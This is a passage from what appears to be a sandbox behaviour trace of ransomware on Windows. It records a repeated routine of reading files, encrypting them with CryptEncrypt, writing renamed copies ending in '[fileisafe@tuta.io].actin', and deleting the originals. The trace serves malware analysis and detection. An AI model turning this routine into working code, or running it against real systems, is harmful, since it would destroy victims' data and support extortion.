lpNumberOfBytesRead=0x38efaa4*=0x4758, lpOverlapped=0x0) returned 1 [0047.486] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4760, dwBufLen=0x4760 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4760) returned 1 [0047.486] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x4760, lpOverlapped=0x0) returned 1 [0047.529] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf720c0) returned 1 [0047.529] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.529] CryptEncrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0047.529] CryptDestroyKey (hKey=0xf720c0) returned 1 [0047.529] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0047.529] CryptDestroyKey (hKey=0xf72100) returned 1 [0047.529] CloseHandle (hObject=0x314) returned 1 [0047.529] CloseHandle (hObject=0x32c) returned 1 [0047.530] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll")) returned 1 [0047.531] SetEvent (hEvent=0x2e8) returned 1 [0047.532] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.532] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0047.532] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=17752) returned 1 [0047.532] CloseHandle (hObject=0x32c) returned 1 [0047.532] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll")) returned 0x80 [0047.532] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.532] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0047.532] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.532] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.532] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0047.532] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf720c0) returned 1 [0047.532] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.533] ReadFile (in: hFile=0x32c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x4558, lpOverlapped=0x0) returned 1 [0047.534] CryptEncrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4560, dwBufLen=0x4560 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4560) returned 1 [0047.534] WriteFile (in: hFile=0x314, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x4560, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x4560, lpOverlapped=0x0) returned 1 [0047.535] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71d00) returned 1 [0047.535] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.535] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0047.535] CryptDestroyKey (hKey=0xf71d00) returned 1 [0047.535] WriteFile (in: hFile=0x314, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0047.535] CryptDestroyKey (hKey=0xf720c0) returned 1 [0047.535] CloseHandle (hObject=0x32c) returned 1 [0047.535] CloseHandle (hObject=0x314) returned 1 [0047.536] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll")) returned 1 [0047.537] SetEvent (hEvent=0x2e8) returned 1 [0047.537] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.537] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0047.537] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=5827) returned 1 [0047.537] CloseHandle (hObject=0x314) returned 1 [0047.537] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf")) returned 0x80 [0047.538] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.538] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0047.538] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.538] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.538] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.541] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71a40) returned 1 [0047.541] CryptSetKeyParam (hKey=0xf71a40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.541] ReadFile (in: hFile=0x314, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x16c3, lpOverlapped=0x0) returned 1 [0047.542] CryptEncrypt (in: hKey=0xf71a40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x16d0, dwBufLen=0x16d0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x16d0) returned 1 [0047.543] WriteFile (in: hFile=0x320, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x16d0, lpOverlapped=0x0) returned 1 [0047.543] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71a80) returned 1 [0047.543] CryptSetKeyParam (hKey=0xf71a80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.543] CryptEncrypt (in: hKey=0xf71a80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0047.543] CryptDestroyKey (hKey=0xf71a80) returned 1 [0047.543] WriteFile (in: hFile=0x320, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0047.544] CryptDestroyKey (hKey=0xf71a40) returned 1 [0047.544] CloseHandle (hObject=0x314) returned 1 [0047.544] CloseHandle (hObject=0x320) returned 1 [0047.544] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf")) returned 1 [0047.545] SetEvent (hEvent=0x2e8) returned 1 [0047.545] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.545] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.546] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=60684) returned 1 [0047.546] CloseHandle (hObject=0x320) returned 1 [0047.546] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml")) returned 0x80 [0047.546] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.546] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.546] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.546] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.546] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0047.546] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71fc0) returned 1 [0047.546] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.546] ReadFile (in: hFile=0x320, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0xed0c, lpOverlapped=0x0) returned 1 [0047.549] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xed10, dwBufLen=0xed10 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xed10) returned 1 [0047.549] WriteFile (in: hFile=0x314, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xed10, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xed10, lpOverlapped=0x0) returned 1 [0047.551] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71dc0) returned 1 [0047.551] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.551] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0047.551] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0047.551] WriteFile (in: hFile=0x314, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0047.551] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0047.551] CloseHandle (hObject=0x320) returned 1 [0047.551] CloseHandle (hObject=0x314) returned 1 [0047.553] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml")) returned 1 [0047.554] SetEvent (hEvent=0x2e8) returned 1 [0047.554] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.554] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0047.554] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=14168) returned 1 [0047.554] CloseHandle (hObject=0x314) returned 1 [0047.554] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll")) returned 0x80 [0047.554] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.554] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0047.555] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.555] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.555] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.555] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf720c0) returned 1 [0047.555] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.555] ReadFile (in: hFile=0x314, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x3758, lpOverlapped=0x0) returned 1 [0047.556] CryptEncrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x3760, dwBufLen=0x3760 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x3760) returned 1 [0047.556] WriteFile (in: hFile=0x320, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x3760, lpOverlapped=0x0) returned 1 [0047.558] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71ec0) returned 1 [0047.558] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.558] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0047.558] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0047.558] WriteFile (in: hFile=0x320, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0047.558] CryptDestroyKey (hKey=0xf720c0) returned 1 [0047.558] CloseHandle (hObject=0x314) returned 1 [0047.558] CloseHandle (hObject=0x320) returned 1 [0047.559] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll")) returned 1 [0047.560] SetEvent (hEvent=0x2e8) returned 1 [0047.560] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.560] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.561] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=4015) returned 1 [0047.561] CloseHandle (hObject=0x320) returned 1 [0047.561] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf")) returned 0x80 [0047.561] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.561] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.561] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.561] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.561] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0047.563] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71a40) returned 1 [0047.563] CryptSetKeyParam (hKey=0xf71a40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.563] ReadFile (in: hFile=0x320, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0xfaf, lpOverlapped=0x0) returned 1 [0047.564] CryptEncrypt (in: hKey=0xf71a40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xfb0, dwBufLen=0xfb0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xfb0) returned 1 [0047.564] WriteFile (in: hFile=0x314, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xfb0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xfb0, lpOverlapped=0x0) returned 1 [0047.565] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71cc0) returned 1 [0047.565] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0047.565] CryptEncrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0047.565] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0047.565] WriteFile (in: hFile=0x314, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0047.565] CryptDestroyKey (hKey=0xf71a40) returned 1 [0047.565] CloseHandle (hObject=0x320) returned 1 [0047.566] CloseHandle (hObject=0x314) returned 1 [0047.566] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf")) returned 1 [0047.567] SetEvent (hEvent=0x2e8) returned 1 [0047.567] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0047.567] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0047.567] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=80254) returned 1 [0047.567] CloseHandle (hObject=0x314) returned 1 [0047.567] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml")) returned 0x80 [0047.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0047.568] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0047.568] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.568] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0047.568] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0047.568] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71ac0) returned 1 [0047.568] CryptSetKeyParam (hKey=0xf71ac0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 